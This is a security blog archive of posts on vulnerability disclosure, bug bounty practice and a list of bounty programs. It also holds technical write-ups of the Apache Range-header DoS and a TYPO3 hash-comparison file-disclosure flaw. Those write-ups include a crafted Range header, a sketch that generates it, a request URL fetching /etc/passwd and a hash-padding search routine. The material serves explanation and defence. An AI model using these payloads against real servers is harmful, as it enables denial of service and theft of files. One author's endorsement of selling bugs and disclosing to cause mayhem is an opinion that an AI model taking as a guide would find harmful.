
 

Showing posts with label disclosure. Show all posts

Vulnerability Disclosure: what could that new approach look like?

A few weeks ago, Enno Rey published an interesting blog post reflecting on vulnerability disclosure, discussing how the industry needs to adjust the “traditional” practices for disclosing software defects to vendors. If you haven't read it yet, it’s highly recommended, as it captures the genuine experience of someone who has been dealing with vulnerabilities for over a decade.

At the end of the post, Enno invites an open debate, asking the community: “What could that new approach look like?”
As a multi-author blog written by security professionals with different backgrounds, interests and opinions, we decided to provide our input to this important discussion.

Luca Carettoni - @_ikki


If you believe in the vision of building a secure Internet, disclosing vulnerabilities to the vendor is evidently a strong requirement. Since the traditional model of reporting defects “for free” has demonstrated its limitations, it’s important that we build a sustainable ecosystem where security researchers can disclose vulnerabilities, receive decent compensation and ultimately hand over the bug to the vendor. Bug bounties and the few vulnerability brokers that do not rely on the secrecy of the information (e.g. ZDI) are the incentive for disclosing to the vendor, while alleviating the pain of the process. We need to increase those opportunities by having more programs and higher rewards. Even without outbidding the black market, many researchers will prefer this approach for its ethical implications, resulting in a win-win situation.

If the vendor doesn't care (hey Mary!), digital self-defense in the form of full disclosure is a valid alternative, so that the community can work together on creating mitigations and resilient infrastructure in a timely manner. In these situations, Google's 90-day disclosure deadline is an example of a mechanism used to improve industry response times to security bugs.

Michele Orrù - @antisnatchor


Freedom is the key. I’m tired of regulations and compliance with rules imposed by people who are not even in the security industry. If I find a bug, I want the freedom to do whatever I want with it, for instance:
  • Keep it private and use it during legit penetration tests or red team engagements, then report it to the vendor 12 months later because it’s Unholy Christmas time; 
  • Sell it just like a PoC, or sit on it to achieve full RCE and then sell it to some broker;  
  • Just go Full Disclosure and publish as a fake persona to cause mayhem;  
  • Privately report it to the vendor and help them fix it, etc. 

Let's say I find a bug in a (defensive) security product. I would never report it to the vendor unless they pay a (very) good amount of money. There are tons of security product vendors who make millions of dollars selling crap that works so-so and most of the time can be owned remotely, effectively becoming a pivot point in the customer’s network. Why should I help them for free to make even more money silently patching bugs in their systems?

Moreover, the annoying stories of people saying “hey, if you release that 0day, the black market will use it!”, or “hey, isn’t that open source hacking tool very dangerous if used by the wrong people?” can be demystified very easily. In my opinion, governments use the black market as a resource when they really need to, much as the Italian government uses the Mafia to get intel or help in certain circumstances. As for open source hacking tools (like vulnerabilities) being dangerous: how they are used is the key here. In fact, I see a certain analogy between OSS hacking tools and 0days. If someone uses an OSS hacking tool to own a financial institution and gets caught, would you blame the developers of the tool or the guy who did the hack? Same for a 0day: would you blame the person who found it, the person who used it, or the vendor? Would you blame Vitaly for discovering and selling the infamous Flash 0day, HackingTeam who weaponized it to “rule-them-all”, or Adobe for caring so little about security?

Truth is, education and knowledge are the keys. If we can teach the new generation how to write secure code, how to fuzz during software development and testing, and to never blindly trust input, then we will really increase Internet security. If we continue down the path of ignorance and security by obscurity, chaos is nearer.

Luca De Fulgentis - @_daath


Granted that full disclosure may not be that ethical in certain circumstances (remember Gobbles' apache-scalp?), I don't truly believe in what is called “responsible” disclosure either. Being “responsible” implies adhering to an ethics that, in turn, implies labeling things as “right” or “wrong”. Instead, my own experience leads me to think in terms of what simply “works”, rather than limiting choices – such as disclosing a bug – on the basis of a dualistic paradigm.

I never really understood the term “ethics”, especially applied to the real (security) world. We live in the dark ages of the Internet of Things, where we are observing the rise of “ethical white knights” who build their fame and glory by stealing someone else's code or shitting on enemies (of the Internet, of course). While these useless characters only exist because of the “evil” they are trying to banish – and, hopefully, they will leave the scene now that the evil has been heavily hacked – what really makes me suffer is the term “ethical hacking”.

Ethical hacking’s deliverables are often intended as weapons to fuck up or deceive someone: technology or service providers, colleagues, managers and sometimes even customers. And let me say that most security firms and related professionals out there blindly accept this perverse “game”, even while claiming to be "ethical" or "white-something" - after all, business is business.

Back to the vulnerability disclosure debate: I’m not in the right position to properly identify a model that works, but it sounds like an NP-complete problem to solve, and I don't think I'm wrong in saying that it can be compared to other well-known issues afflicting mankind.

So the whole topic could be shifted to a completely different level: we had, have and will always have insurmountable constraints, represented by subjects interested only in money, fame or power, that will always mark both the upper and lower bounds of "improvements" – take, for example, a safer Internet via a robust vulnerability disclosure model. It's the same as the old plain physical world. It’s all the same, only the names will change.


Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

The truth is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed, resulting in frustration and headaches for both vendors and researchers. Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives. Bug bounties are a great complement to other practices, but cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounty bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering starting a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust between client and provider. Trust is important during testing, and especially crucial at disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs while claiming that they are not relevant (and thus not eligible for rewards) is a perfect way to lose trust.

2. Fast turnaround
Security researchers are happy to spend extra time explaining bugs and providing workarounds; however, they also expect to be notified (and rewarded) at a similarly reasonable speed. From reporting the bug to paying out rewards, you should have a fast turnaround. Fast means days - not months. Even if you need more time to fix the bug, pay out the reward immediately and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles from bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and investigate application crashes. Whether internally or by leveraging trusted parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate them. In several cases, the interlocutors were software engineers rather than security folks: we simply speak different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget, just set up a wall of fame, send nice swag and be creative. For instance, you could decide to pay only for specific classes of bugs or medium-high impact vulnerabilities. Always paying at the low end of your rewards range, even for critical security bugs, is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes explaining the reason for rejection, especially when the researcher has over-estimated the severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

"No More Free Bugs" Initiatives

Two years after the launch of the "No More Free Bugs" philosophy, several companies and Open Source projects are now offering programs designed to encourage security research in their products. In addition, many private firms are publicly offering vulnerability acquisition programs.


This post is an attempt to catalog all public and active incentives. This includes traditional "Bug Bounty Programs" as well as "Vulnerability/Exploit Acquisition Programs".
Update (19 Oct 2013): A new website http://www.bugsheet.com/bug-bounties has started collecting bug bounties and disclosure programs. I do recognize that an actual website is better than a single blog post, thus I've discontinued this list.

Bug Bounty Programs


Sponsor | Target | Reward
AT&T Security vulnerabilities found within the AT&T API Platform $100-$5,000, plus merchandise (e.g. LTE data cards, phones with free service)
Avast Security vulnerabilities in the latest consumer Windows versions of Avast $200-$5,000
Barracuda Vulnerabilities in Barracuda appliances, including Spam/Virus Firewall, Web Filter, WAF, NG Firewall $500-$3,133.7
BugCrowd Crowdsourced security testing. BugCrowd manages bug bounty programs for third-party companies Starting from $250
BugWolf Marketplace for bug bounty hunters. BugWolf manages bug bounty programs for third-party companies Starting from $500
Coinbase Previously unknown security vulnerabilities in Coinbase's web platform Starting from 5 BTC
Cryptocat XSS bugs, crypto implementation bugs, arbitrary code execution in Cryptocat's code $n/a
Djbdns Verifiable security holes in the latest version of Djbdns $1000
Etsy Web application vulnerabilities affecting the main www.etsy.com site, the etsy.com API, or the official Etsy mobile application Starting from $500
Facebook Facebook web platform security bugs. No third-party applications Starting from $500
Future of Enforcement Web vulnerabilities in Future of Enforcement's website €100
Gallery Security issues in the latest stable release of the popular web based photo album organizer $100-$1000
Google Chromium browser project, Chrome OS and selected Google web properties bugs $500-$20,000
IntegraXor HMI/SCADA Security vulnerabilities in IGX SCADA systems with verifiable proof-of-concepts Up to 8K I/O points (~$3999)
Hex-Rays Security bugs in the latest public release of Hex-Rays IDA Up to $3000
Kaneva High impact web application vulnerabilities $100
Mega Web application vulnerabilities and crypto bugs affecting MEGA's online systems Up to €10000
Meraki All web content under *.meraki.com, Meraki-operated web properties, systems manager client applications and Meraki hardware devices $100-$2500
Mozilla Firefox, Thunderbird and selected Mozilla Internet-facing websites bugs $500-$3000, plus Mozilla T-shirt
Nokia Vulnerabilities in all Nokia run services, applications and products excluding corporate infrastructure $n/a
PayPal Web application vulnerabilities in www.paypal.com $n/a
Piwik Flaws in Piwik web analytics software $200-$500
Qmail Verifiable security holes in the latest version of Qmail $5000
Ripple Security issues in Ripple, an OpenSource person to person payment network Up to $10000
Samsung Security bugs in Samsung TV/BD Starting from $500
Tarsnap Tarsnap bugs, affecting either pre-release or released versions $1-$2000
Yandex Security vulnerabilities in Yandex's services or mobile applications, as specified on the terms and conditions page $100-$1000

Vulnerability/Exploit Acquisition Programs


Sponsor | Target | Reward
BeyondSecurity SecuriTeam High and medium impact bugs in widely spread software $n/a
Coseinc Unpublished security vulnerabilities for Windows, Linux and Solaris $n/a
Exodus Intelligence Program Vulnerability research acquisition program for unknown vulnerabilities affecting widely deployed software packages $n/a plus yearly bonuses
ExploitHub Legitimate market-place for non-zero-day exploits $50-$1000. Both one-time purchase payments as well as recurring monthly payments from site-license customers
iSight Partners Bugs in typical corporate environment applications $n/a
Netragard 0-day exploits against well-known software $n/a
Packet Storm Exploits for 0-day and 1-day vulnerabilities in enterprise-grade software (Microsoft, Flash, Java, etc.) $1000-$7000
TippingPoint ZDI Undisclosed vulnerability research, affecting widely deployed software $n/a plus awards and benefits, depending on the contributor's status
VeriSign iDefence Security vulnerabilities in widely deployed applications $n/a
White Fir Design Bugs in WordPress code and plugins (with over 1 million downloads and compatible with the most recent WordPress) $50-$500

Contributions are welcome! If you are aware of an initiative not listed here or you want to report an inaccuracy in your initiative, please leave a comment and we will update this page over time. In fact, the more people, the better.

Just to clarify, we aim at indexing programs that are:
  • Legal. Although black/gray marketplaces exist, we certainly don't want to list them here
  • Active. We want to keep track of ongoing initiatives. Even time-limited programs are eligible, as long as they are still accepting submissions
  • Public. All entries must have publicly available details. This may range from accurate guidelines and rules to just a simple sentence stating the nature of the incentive. It hence follows that we are going to report public information only. In case of cash rewards, the actual amount is reported whenever the min-max price paid is clearly stated
  • Reward-based. In most cases, entries are "cash-for-bugs" programs. However, any kind of tangible reward is eligible. "No More Free Bugs" versus "No More Cheap Bugs" disputes are not considered here
Disclaimer: we do not endorse, represent or warrant the accuracy or reliability of any of these programs.

    On exploits and assessing security

    Everything started on a summer Friday, August 19 2011, 23:23 BST (so it might be reported to Sat 20 Aug, depending on your timezone).
    Kingcope, a Greek hacker known for a long stream of 0days and trash Greek music soundtracks, posts a very short email on the Full-Disclosure mailing list. The email has a promising title, Apache Killer, and an attachment: killapache.pl.

    The script is extremely simple: 84 lines of perl, comments included, capable of killing any Apache web server.

    The core of the attack is extremely simple: the script sends a (perfectly legit) request to the Apache server, including a Range header similar to this:

    Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19, 5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29, -[..and many many more..].

    What happens behind the scenes is that Apache has to make separate copies of the response for each of those ranges and, guess what, its memory usage explodes.
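    The header-construction logic can be sketched in a few lines (a paraphrase in Python, not Kingcope's original Perl; the range count is illustrative):

```python
# Sketch (in Python, paraphrasing the original Perl) of how
# killapache.pl builds its Range header; the range count is illustrative.
def build_range_header(n):
    # One open-ended range plus n overlapping ranges anchored at byte 5,
    # mirroring the "bytes=0-,5-0,5-1,5-2,..." pattern of the exploit
    ranges = ["0-"] + ["5-%d" % i for i in range(n)]
    return "Range: bytes=" + ",".join(ranges)

print(build_range_header(5))  # Range: bytes=0-,5-0,5-1,5-2,5-3,5-4
```

    The real script sends this header over many parallel connections; the header alone is enough to see why Apache's per-range copies add up.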

    The Range header (defined here in RFC 2616) has legitimate uses: for instance, PDF readers use it while you scroll down the page. Let us reiterate that the attack is a perfectly well formed request: "A byte range operation MAY specify a single range of bytes, or a set of ranges within a single entity."
    On a side note, IIS only allows up to 5 ranges for each HTTP request, and it is not vulnerable - with the notable exception of IIS 5, but you don't have those around anymore, do you?
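    The IIS behavior suggests an obvious mitigation: count the ranges and refuse requests with too many. A minimal sketch (illustrative names, not production code):

```python
# Illustrative sketch of an IIS-style limit: count the ranges in a
# Range header value and reject requests that specify too many.
def range_count(range_spec):
    # e.g. "bytes=0-99,200-299" -> 2
    _, _, ranges = range_spec.partition("=")
    return len([r for r in ranges.split(",") if r.strip()])

def acceptable(range_spec, limit=5):
    return range_count(range_spec) <= limit
```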

    But back to our story. Apache reacted "quickly", issuing a security advisory [CVE-2011-3192] a mere 4 days after the release, on August 24 16:16 GMT [http://article.gmane.org/gmane.comp.apache.announce/58]. They acknowledged the bug, promising that "A full fix is expected in the next 48 hours." Apache also provided a number of different mitigations: using mod_rewrite, limiting the size of the request field, or even a dedicated module.
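    The SetEnvIf-based mitigation from the advisory looked along these lines (quoted from memory; consult the advisory for the authoritative rules):

```apache
# Drop the Range header when more than 5 ranges are requested
# (paraphrased from the CVE-2011-3192 advisory; verify before use)
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
```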

    +1 for having included so many mitigations inside the advisory, -1 for taking so long to give an official answer.

    A number of different answers were surfacing by that time, including SpiderLabs' suggestion of using ModSecurity (though, truth be told, the answer was already floating around some forums). The 24th was, in short, the moment when the general public started noticing the issue - thanks also to an article in The Register which, even though it drops a totally out-of-place comment on open source security, at least cites Zalewski.

    And this is the interesting bit of the story: the bug was well known!
    lcamtuf reported this exact issue in 2007 - just 4 years earlier.

    The reactions were, to say the least, wrong. William A. Rowe [of the Apache Software Foundation] answered: "With the host of real issues out there in terms of massively parallel DDoS infrastructures that abound, this is, as you say, quite a silly report." Yeah, sure. The issue was also thought to be connected to the sliding window (Rowe: "On the matter of your 1GB window (which is, again, the real issue), you have any examples of a kernel that permits that large a sliding window buffer by default").
    Probably even lcamtuf did not understand the full impact of the issue - we are talking about a full DoS against the default installation, after all, even if it is very easily avoided - as he says: "William, again, this is not a critical issue; I did mention that, and if it were, I wouldn't report it that way". The issue was thus not really understood by either party, or at least its full implications were not. Going into the details of the bug report, we must grant that it focused more on the "network" attack vector - not exactly the one exploited by Kingcope's attack, which results in memory exhaustion. Siim Põder also tried to implement the attack, but failed. The thread then just died.

    Bottom line: a general failure of the community to identify and evaluate a risk in the absence of an exploit. So much for all the "risk assessment without full disclosure" talk: without an exploit, an entire community looking at the description of a bug in the world's most widespread web server failed to evaluate the risk.

    At the same time, there was not a single mention of the bug on the Apache dev@ mailing list. Compare that to the mail thread [mod_deflate & range requests] from last August: http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/browser. This exploit, in the end, resulted in a ticket on the IETF tracker with a request to change the standard [http://trac.tools.ietf.org/wg/httpbis/trac/ticket/311]: that's what we call impact.

    And all because an exploit was not developed in the first place...

    TYPO3-SA-2010-020, TYPO3-SA-2010-022 explained

    On 16th December, TYPO3 released a new security update (TYPO3-SA-2010-022) for their content management system. Apparently, this web-based framework is widely used in many important websites.
    Within this update, the TYPO3 team fixed a vulnerability that I discovered a few weeks ago. In detail, this discovery pertains to a previous vulnerability, fixed in TYPO3-SA-2010-020 and discovered by Gregor Kopf.

    TYPO3 decided to follow a policy of least disclosure. Although it's an Open Source project, no technical details are available in the wild besides these (1,2). As I strongly believe that this practice does not improve overall security (as mentioned in a previous post), I've decided to briefly explain this interesting flaw.

    From the advisory, we can actually deduce two important concepts:

    A Remote File Disclosure vulnerability in the jumpUrl mechanism [..] Because of a non-typesafe comparison between the submitted and the calculated hash, it is possible [..]
    In a nutshell, the JumpUrl mechanism allows tracking access to web pages and provided files (e.g. /index.php?id=2&type=0&jumpurl=/etc/passwd&juSecure=1&locationData=2%3a&juHash=2b1928bfab)

    The patch (see this shell script) simply replaces the two equals signs with three (loose vs strict comparison).

    That's the affected code: in essence, a loose == comparison between $juHash and $calcJuHash.

    Having this knowledge, it is probably clear to the reader that the overall goal is to bypass that comparison. While $juHash is user supplied (string or array), $calcJuHash is derived from substr(md5_value, 10) (a string).

    In PHP, comparisons involving numerical strings result in unexpected behaviors (at least for me, before studying this chapter):
    If you compare a number with a string, or the comparison involves numerical strings, then each string is converted to a number and the comparison is performed numerically
    If the string does not contain any of the characters '.', 'e', or 'E' and the numeric value fits into integer type limits (as defined by PHP_INT_MAX), the string will be evaluated as an integer. In all other cases it will be evaluated as a float.
    For instance, the following comparisons are always TRUE:
    if(0=="php")-> TRUE
    if(12=="12php")-> TRUE
    if(110=="110")-> TRUE
    if(100=="10E1")-> TRUE
    if(array()==NULL) -> TRUE
    [..]
    And again, also the following comparisons are TRUE:
    If("0"=="0E19280311"){}
    If("0"=="0E00106552"){}
    If("0"=="0E81046233"){}
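    These coercions can be modeled outside PHP. Here is a rough Python approximation of PHP's loose == for numeric strings (pre-PHP 8 semantics); it is an illustration, not PHP's actual implementation, and only covers fully-numeric strings:

```python
import re

# Rough Python model of PHP's loose == for numeric strings
# (pre-PHP 8 semantics). An illustration, not PHP itself.
NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")

def php_loose_eq(a, b):
    if NUMERIC.match(a) and NUMERIC.match(b):
        # PHP converts both sides to numbers, so "0" == "0E19280311"
        # because 0e19280311 in scientific notation is just 0.0
        return float(a) == float(b)
    return a == b
```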
    Consequently, we can pad and wait until the substring of an md5 hash resembles this form. If you do the math, you will discover that hitting such a calculated hash requires considerably fewer trials than pure bruteforcing:
    ~37037037 max trials (worst case) VS 3656158440062976 total possibilities
    In practice, the number of iterations is even lower, as "0000E13131" and similar strings are also accepted.
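    The padding search can be sketched like this (a hypothetical reimplementation assuming the substr(md5(...), 10) construction described above; names and the try bound are illustrative):

```python
import hashlib
import re

# A calculated hash is "zero-like" when PHP's loose == would treat it
# as equal to "0": zeros, optionally followed by E/e and digits only.
ZERO_LIKE = re.compile(r"^0+([eE]\d+)?$")

def ju_hash(data):
    # Mirrors the advisory's substr(md5(...), 10): a 22-char hex substring
    return hashlib.md5(data.encode()).hexdigest()[10:]

def find_zero_like(base, max_tries):
    # Pad the input until the calculated hash is numerically zero.
    # In reality this takes millions of attempts (~1 in 37M per try),
    # so max_tries must be very large; the loop is only a sketch.
    for i in range(max_tries):
        candidate = base + "A" * i
        if ZERO_LIKE.match(ju_hash(candidate)):
            return candidate
    return None
```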

    To further improve this attack, I've discovered another bypass (TYPO3-SA-2010-022) which allows the disclosure of TYPO3_CONF_VARS['SYS']['encryptionKey']. In this way, it is possible to retrieve the key once and download multiple files without repeating the entire process. Using multiple requests, this attack takes a few minutes (8-20 minutes in a local network). A real coder can surely enhance it.

    As you can see from the exploit (posted on The Exploit Database), the fileDenyPattern mechanism bypass is pretty trivial. A demonstration video is also available here (slow connection, sorry).

    Keep your TYPO3 installation updated! A patch is already available from the vendor's site.

    @_ikki

    Unspecified vulnerabilities

    If you're a pentester, it's probably not news to you that "least disclosure" policies for disclosing vulnerabilities are fruitless. Unfortunately, they are even counterproductive for the entire security ecosystem, and I will try to convince you of that in this post.

    Before going any further, let's explain what "least disclosure" actually means.
    In a nutshell, least disclosure is about providing only those facts about a vulnerability that are needed to know whether a user might be affected and what the possible impact would be. No technical details, no exploits, no proof-of-concept code.

    As mentioned here, you may argue that it increases the overall security as a random "black hat needs to put some efforts in thinking and coding before he's able to exploit a vulnerability".

    However, we all claim that "security through obscurity" is bad:

    • Aggressors don't have time constraints. They can analyze patches, read all documentation and spend nights on a single flaw

    • No technical details in the wild generally means no signatures and detectors in security tools

    • "Least Disclosure" tends to degenerate into "Unspecified Vulnerability in Unspecified Components". Please fix your computer and don't ask why
    Although we certainly cannot force vendors' disclosure policies, sharing the outcome of any security research may be beneficial at the end of the day.

    Thoughtful reader, please note that profiting from vulnerabilities does not necessarily imply concealing details. For instance, see the Mozilla Security Bounty Program FAQ:
    We're rewarding you for finding a bug, not trying to buy your silence
    If you enjoy the spirit, you may appreciate the following posts. Welcome back NibbleSec readers!

    @_ikki